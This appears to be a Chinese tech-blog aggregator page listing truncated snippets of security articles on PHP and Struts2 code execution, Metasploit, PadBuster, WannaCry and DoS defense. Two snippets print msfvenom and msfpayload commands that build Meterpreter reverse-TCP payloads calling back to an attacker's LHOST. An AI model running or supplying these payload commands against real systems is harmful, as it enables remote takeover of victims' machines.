0x01 漏洞利用知识点 1.代码执行 2.变量覆盖 3.文件包含 0x02 漏洞分析 首先在/fenlei1.0/do/jf.php文件中存在代码执行片段 追溯到数据库表pre_jfabout中,分析数据库表pre_jfabout中如果$rs2[title]和$rs2[content]可控,那么就 ...
分类:
其他好文 时间:
2017-08-22 12:36:08
阅读次数:
201
对于走在安全路上的小菜来说,这几个exp、Exploit、Exploit Pack、exp-gui、Payload、MetaSploit名词着实把人转的不轻,以下给大家解释下: Exp,就是Exploit。漏洞利用的意思,注意,有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。我 ...
分类:
Web程序 时间:
2017-08-18 11:18:22
阅读次数:
348
一、环境搭建: 二、攻击流程: 攻击流程图解: 1.在kali linux中利用metasploit生成用于建立反向链接的dll文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > ...
分类:
其他好文 时间:
2017-08-12 21:24:43
阅读次数:
177
前不久公司一个同事在QQ上找我,说要考察一下我们小组成员的综合能力,拿站思路,以及水平之类的,丢给我一个日本网站,让我将这个网站渗透一下,能有多深就多深... 我当时正在忙工作,简单的看了一下网站,是一个日本本土企业网站,界面倒是简洁,出于好奇又继续检验了一下后台语言用,发现用得是php,再看了看w ...
分类:
其他好文 时间:
2017-08-04 09:53:35
阅读次数:
88
1、Immunity Debugger简介 Immunity Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为强的Python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融合于一体,它还附带了一套高 ...
分类:
编程语言 时间:
2017-07-26 12:33:30
阅读次数:
266
ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片、Javascript文件)嵌入到dll文件中。而网页中,会使用WebResource.axd?d=XXX的形式请求资源。其中,XXX采用CBC-R加密的方式生成的访问密钥 ...
分类:
数据库 时间:
2017-07-26 10:44:02
阅读次数:
245
在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在一处任意代码执行漏洞。当你的应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行。 POC: 漏洞利用环境搭建: 利用d ...
分类:
其他好文 时间:
2017-07-09 10:43:25
阅读次数:
681
毁灭性的全球ransomware爆发WannaCry和Petya由于互联网最古老的网络协议(即Message Message Block 1)(又称SMBv1)中的一个漏洞而迅速传播。 运行Windows 10的电脑可以免受这种漏洞利用,但这并不意味着您将在下次遇到这样的幸运。为了实现全面的多层安全 ...
Metasploit1启动:msfconsoleexploit漏洞利用工具payloads----àshellcode漏洞利用后执行的代码木马控制服务器远程控制木马程序2.根据自己的ip生成一个木马msfpayloadwindows/meterpreter/reverse_tcpLHOST=linux的ipLPORT=55555X>test.exewindows/meterpreter/reverse_tcp..
分类:
系统相关 时间:
2017-06-30 12:25:57
阅读次数:
3756
总体来说,对DoS和DDoS的防范主要从下面几个方面考虑: 尽可能对系统加载最新补丁,并采取有效的合规性配置,降低漏洞利用风险; 采取合适的安全域划分,配置防火墙、入侵检测和防范系统,减缓攻击。 采用分布式组网、负载均衡、提升系统容量等可靠性措施,增强总体服务能力。 可参考措施如下: 1、采用高性能 ...
分类:
其他好文 时间:
2017-06-27 01:07:30
阅读次数:
390